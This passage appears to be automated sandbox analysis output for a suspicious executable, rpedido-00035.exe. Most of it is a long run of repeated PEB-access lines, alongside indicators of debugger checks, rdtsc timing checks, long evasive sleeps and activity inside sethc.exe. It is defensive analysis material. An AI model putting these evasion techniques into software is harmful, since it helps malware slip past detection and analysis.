            Source: C:\Windows\SysWOW64\sethc.exe API/Special instruction interceptor: Address: 7FFB05810594
            Source: C:\Windows\SysWOW64\sethc.exe API/Special instruction interceptor: Address: 7FFB0580D764
            Source: C:\Windows\SysWOW64\sethc.exe API/Special instruction interceptor: Address: 7FFB0580D324
            Source: C:\Windows\SysWOW64\sethc.exe API/Special instruction interceptor: Address: 7FFB0580D364
            Source: C:\Windows\SysWOW64\sethc.exe API/Special instruction interceptor: Address: 7FFB0580D004
            Source: C:\Windows\SysWOW64\sethc.exe API/Special instruction interceptor: Address: 7FFB0580FF74
            Source: C:\Windows\SysWOW64\sethc.exe API/Special instruction interceptor: Address: 7FFB0580D6C4
            Source: C:\Windows\SysWOW64\sethc.exe API/Special instruction interceptor: Address: 7FFB0580D864
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36051763 rdtsc 2_2_36051763
            Source: C:\Windows\SysWOW64\sethc.exe Window / User API: threadDelayed 9852
            Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 881
            Source: C:\Users\user\Desktop\rpedido-00035.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe API coverage: 0.3 %
            Source: C:\Windows\SysWOW64\sethc.exe API coverage: 1.1 %
            Source: C:\Windows\SysWOW64\sethc.exe TID: 1996 Thread sleep count: 122 > 30
            Source: C:\Windows\SysWOW64\sethc.exe TID: 1996 Thread sleep time: -244000s >= -30000s
            Source: C:\Windows\SysWOW64\sethc.exe TID: 1996 Thread sleep count: 9852 > 30
            Source: C:\Windows\SysWOW64\sethc.exe TID: 1996 Thread sleep time: -19704000s >= -30000s
            Source: C:\Windows\SysWOW64\sethc.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\sethc.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 0_2_004066F3 FindFirstFileW,FindClose, 0_2_004066F3
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405ABE
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 0_2_00402862 FindFirstFileW, 0_2_00402862
            Source: rpedido-00035.exe, 00000002.00000003.44783272355.0000000005C24000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44881124399.0000000005C24000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\rpedido-00035.exe API call chain: ExitProcess graph end node graph_0-4671
            Source: C:\Users\user\Desktop\rpedido-00035.exe API call chain: ExitProcess graph end node graph_0-4513
            Source: C:\Windows\SysWOW64\sethc.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\sethc.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\sethc.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36051763 rdtsc 2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 0_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow, 0_2_00401E43
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h] 2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h] 2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h] 2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h] 2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h] 2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h] 2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603D600 mov eax, dword ptr fs:[00000030h] 2_2_3603D600
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603D600 mov eax, dword ptr fs:[00000030h] 2_2_3603D600
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360CF607 mov eax, dword ptr fs:[00000030h] 2_2_360CF607
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604360F mov eax, dword ptr fs:[00000030h] 2_2_3604360F
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360E4600 mov eax, dword ptr fs:[00000030h] 2_2_360E4600
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36017623 mov eax, dword ptr fs:[00000030h] 2_2_36017623
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36015622 mov eax, dword ptr fs:[00000030h] 2_2_36015622
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36015622 mov eax, dword ptr fs:[00000030h] 2_2_36015622
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604C620 mov eax, dword ptr fs:[00000030h] 2_2_3604C620
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360BD62C mov ecx, dword ptr fs:[00000030h] 2_2_360BD62C
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360BD62C mov ecx, dword ptr fs:[00000030h] 2_2_360BD62C
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360BD62C mov eax, dword ptr fs:[00000030h] 2_2_360BD62C
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36010630 mov eax, dword ptr fs:[00000030h] 2_2_36010630
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36040630 mov eax, dword ptr fs:[00000030h] 2_2_36040630
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36098633 mov esi, dword ptr fs:[00000030h] 2_2_36098633
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36098633 mov eax, dword ptr fs:[00000030h] 2_2_36098633
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36098633 mov eax, dword ptr fs:[00000030h] 2_2_36098633
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604F63F mov eax, dword ptr fs:[00000030h] 2_2_3604F63F
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604F63F mov eax, dword ptr fs:[00000030h] 2_2_3604F63F
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36013640 mov eax, dword ptr fs:[00000030h] 2_2_36013640
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3602F640 mov eax, dword ptr fs:[00000030h] 2_2_3602F640
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3602F640 mov eax, dword ptr fs:[00000030h] 2_2_3602F640
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3602F640 mov eax, dword ptr fs:[00000030h] 2_2_3602F640
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604C640 mov eax, dword ptr fs:[00000030h] 2_2_3604C640
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604C640 mov eax, dword ptr fs:[00000030h] 2_2_3604C640
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600D64A mov eax, dword ptr fs:[00000030h] 2_2_3600D64A
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600D64A mov eax, dword ptr fs:[00000030h] 2_2_3600D64A
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36045654 mov eax, dword ptr fs:[00000030h] 2_2_36045654
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604265C mov eax, dword ptr fs:[00000030h] 2_2_3604265C
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604265C mov ecx, dword ptr fs:[00000030h] 2_2_3604265C
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604265C mov eax, dword ptr fs:[00000030h] 2_2_3604265C
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601965A mov eax, dword ptr fs:[00000030h] 2_2_3601965A
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601965A mov eax, dword ptr fs:[00000030h] 2_2_3601965A
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36023660 mov eax, dword ptr fs:[00000030h] 2_2_36023660
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36023660 mov eax, dword ptr fs:[00000030h] 2_2_36023660
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36023660 mov eax, dword ptr fs:[00000030h] 2_2_36023660
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36007662 mov eax, dword ptr fs:[00000030h] 2_2_36007662
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36007662 mov eax, dword ptr fs:[00000030h] 2_2_36007662
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36007662 mov eax, dword ptr fs:[00000030h] 2_2_36007662
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604666D mov esi, dword ptr fs:[00000030h] 2_2_3604666D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604666D mov eax, dword ptr fs:[00000030h] 2_2_3604666D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604666D mov eax, dword ptr fs:[00000030h] 2_2_3604666D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36010670 mov eax, dword ptr fs:[00000030h] 2_2_36010670
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36052670 mov eax, dword ptr fs:[00000030h] 2_2_36052670
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36052670 mov eax, dword ptr fs:[00000030h] 2_2_36052670
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360CF68C mov eax, dword ptr fs:[00000030h] 2_2_360CF68C
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020680 mov eax, dword ptr fs:[00000030h] 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36018690 mov eax, dword ptr fs:[00000030h] 2_2_36018690
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3609C691 mov eax, dword ptr fs:[00000030h] 2_2_3609C691
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360D86A8 mov eax, dword ptr fs:[00000030h] 2_2_360D86A8
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360D86A8 mov eax, dword ptr fs:[00000030h] 2_2_360D86A8
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360B86C2 mov eax, dword ptr fs:[00000030h] 2_2_360B86C2
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360DA6C0 mov eax, dword ptr fs:[00000030h] 2_2_360DA6C0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360106CF mov eax, dword ptr fs:[00000030h] 2_2_360106CF
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603D6D0 mov eax, dword ptr fs:[00000030h] 2_2_3603D6D0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360096E0 mov eax, dword ptr fs:[00000030h] 2_2_360096E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360096E0 mov eax, dword ptr fs:[00000030h] 2_2_360096E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601C6E0 mov eax, dword ptr fs:[00000030h] 2_2_3601C6E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360156E0 mov eax, dword ptr fs:[00000030h] 2_2_360156E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360156E0 mov eax, dword ptr fs:[00000030h] 2_2_360156E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360156E0 mov eax, dword ptr fs:[00000030h] 2_2_360156E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360366E0 mov eax, dword ptr fs:[00000030h] 2_2_360366E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360366E0 mov eax, dword ptr fs:[00000030h] 2_2_360366E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608C6F2 mov eax, dword ptr fs:[00000030h] 2_2_3608C6F2
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608C6F2 mov eax, dword ptr fs:[00000030h] 2_2_3608C6F2
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601D700 mov ecx, dword ptr fs:[00000030h] 2_2_3601D700
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600B705 mov eax, dword ptr fs:[00000030h] 2_2_3600B705
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600B705 mov eax, dword ptr fs:[00000030h] 2_2_3600B705
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600B705 mov eax, dword ptr fs:[00000030h] 2_2_3600B705
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600B705 mov eax, dword ptr fs:[00000030h] 2_2_3600B705
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360D970B mov eax, dword ptr fs:[00000030h] 2_2_360D970B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360D970B mov eax, dword ptr fs:[00000030h] 2_2_360D970B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603270D mov eax, dword ptr fs:[00000030h] 2_2_3603270D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603270D mov eax, dword ptr fs:[00000030h] 2_2_3603270D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603270D mov eax, dword ptr fs:[00000030h] 2_2_3603270D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601471B mov eax, dword ptr fs:[00000030h] 2_2_3601471B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601471B mov eax, dword ptr fs:[00000030h] 2_2_3601471B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360CF717 mov eax, dword ptr fs:[00000030h] 2_2_360CF717
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36039723 mov eax, dword ptr fs:[00000030h] 2_2_36039723
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36043740 mov eax, dword ptr fs:[00000030h] 2_2_36043740
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604174A mov eax, dword ptr fs:[00000030h] 2_2_3604174A
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604A750 mov eax, dword ptr fs:[00000030h] 2_2_3604A750
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36032755 mov eax, dword ptr fs:[00000030h] 2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36032755 mov eax, dword ptr fs:[00000030h] 2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36032755 mov eax, dword ptr fs:[00000030h] 2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36032755 mov ecx, dword ptr fs:[00000030h] 2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36032755 mov eax, dword ptr fs:[00000030h] 2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36032755 mov eax, dword ptr fs:[00000030h] 2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h] 2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h] 2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h] 2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h] 2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h] 2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h] 2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h] 2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h] 2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h] 2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360BE750 mov eax, dword ptr fs:[00000030h] 2_2_360BE750
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36022760 mov ecx, dword ptr fs:[00000030h] 2_2_36022760
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36051763 mov eax, dword ptr fs:[00000030h] 2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36051763 mov eax, dword ptr fs:[00000030h] 2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36051763 mov eax, dword ptr fs:[00000030h] 2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36051763 mov eax, dword ptr fs:[00000030h] 2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36051763 mov eax, dword ptr fs:[00000030h] 2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36051763 mov eax, dword ptr fs:[00000030h] 2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36040774 mov eax, dword ptr fs:[00000030h] 2_2_36040774
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36014779 mov eax, dword ptr fs:[00000030h] 2_2_36014779
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36014779 mov eax, dword ptr fs:[00000030h] 2_2_36014779
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360EB781 mov eax, dword ptr fs:[00000030h] 2_2_360EB781
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360EB781 mov eax, dword ptr fs:[00000030h] 2_2_360EB781
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36041796 mov eax, dword ptr fs:[00000030h] 2_2_36041796
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36041796 mov eax, dword ptr fs:[00000030h] 2_2_36041796
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h] 2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h] 2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h] 2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h] 2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h] 2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h] 2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h] 2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h] 2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h] 2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360107A7 mov eax, dword ptr fs:[00000030h] 2_2_360107A7
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360DD7A7 mov eax, dword ptr fs:[00000030h] 2_2_360DD7A7
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360DD7A7 mov eax, dword ptr fs:[00000030h] 2_2_360DD7A7
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360DD7A7 mov eax, dword ptr fs:[00000030h] 2_2_360DD7A7
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360E17BC mov eax, dword ptr fs:[00000030h] 2_2_360E17BC
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360CF7CF mov eax, dword ptr fs:[00000030h] 2_2_360CF7CF
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603E7E0 mov eax, dword ptr fs:[00000030h] 2_2_3603E7E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h] 2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h] 2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h] 2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h] 2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h] 2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h] 2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h] 2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360177F9 mov eax, dword ptr fs:[00000030h] 2_2_360177F9
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360177F9 mov eax, dword ptr fs:[00000030h] 2_2_360177F9
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360CF409 mov eax, dword ptr fs:[00000030h] 2_2_360CF409
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360A6400 mov eax, dword ptr fs:[00000030h] 2_2_360A6400
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360A6400 mov eax, dword ptr fs:[00000030h] 2_2_360A6400
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600640D mov eax, dword ptr fs:[00000030h] 2_2_3600640D
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3600B420 mov eax, dword ptr fs:[00000030h] 2_2_3600B420
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36099429 mov eax, dword ptr fs:[00000030h] 2_2_36099429
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36047425 mov eax, dword ptr fs:[00000030h] 2_2_36047425
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36047425 mov ecx, dword ptr fs:[00000030h] 2_2_36047425
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3609F42F mov eax, dword ptr fs:[00000030h] 2_2_3609F42F
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3609F42F mov eax, dword ptr fs:[00000030h] 2_2_3609F42F
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3609F42F mov eax, dword ptr fs:[00000030h] 2_2_3609F42F
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3609F42F mov eax, dword ptr fs:[00000030h] 2_2_3609F42F
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3609F42F mov eax, dword ptr fs:[00000030h] 2_2_3609F42F
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020445 mov eax, dword ptr fs:[00000030h] 2_2_36020445
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020445 mov eax, dword ptr fs:[00000030h] 2_2_36020445
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020445 mov eax, dword ptr fs:[00000030h] 2_2_36020445
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020445 mov eax, dword ptr fs:[00000030h] 2_2_36020445
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020445 mov eax, dword ptr fs:[00000030h] 2_2_36020445
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36020445 mov eax, dword ptr fs:[00000030h] 2_2_36020445
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604D450 mov eax, dword ptr fs:[00000030h] 2_2_3604D450
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3604D450 mov eax, dword ptr fs:[00000030h] 2_2_3604D450
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601D454 mov eax, dword ptr fs:[00000030h] 2_2_3601D454
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601D454 mov eax, dword ptr fs:[00000030h] 2_2_3601D454
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601D454 mov eax, dword ptr fs:[00000030h] 2_2_3601D454
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601D454 mov eax, dword ptr fs:[00000030h] 2_2_3601D454
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601D454 mov eax, dword ptr fs:[00000030h] 2_2_3601D454
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3601D454 mov eax, dword ptr fs:[00000030h] 2_2_3601D454
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603E45E mov eax, dword ptr fs:[00000030h] 2_2_3603E45E
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603E45E mov eax, dword ptr fs:[00000030h] 2_2_3603E45E
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603E45E mov eax, dword ptr fs:[00000030h] 2_2_3603E45E
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603E45E mov eax, dword ptr fs:[00000030h] 2_2_3603E45E
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_3603E45E mov eax, dword ptr fs:[00000030h] 2_2_3603E45E
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_360DA464 mov eax, dword ptr fs:[00000030h] 2_2_360DA464
            Source: C:\Users\user\Desktop\rpedido-00035.exe Code function: 2_2_36018470 mov eax, dword ptr fs:[00000030h] 2_2_36018470
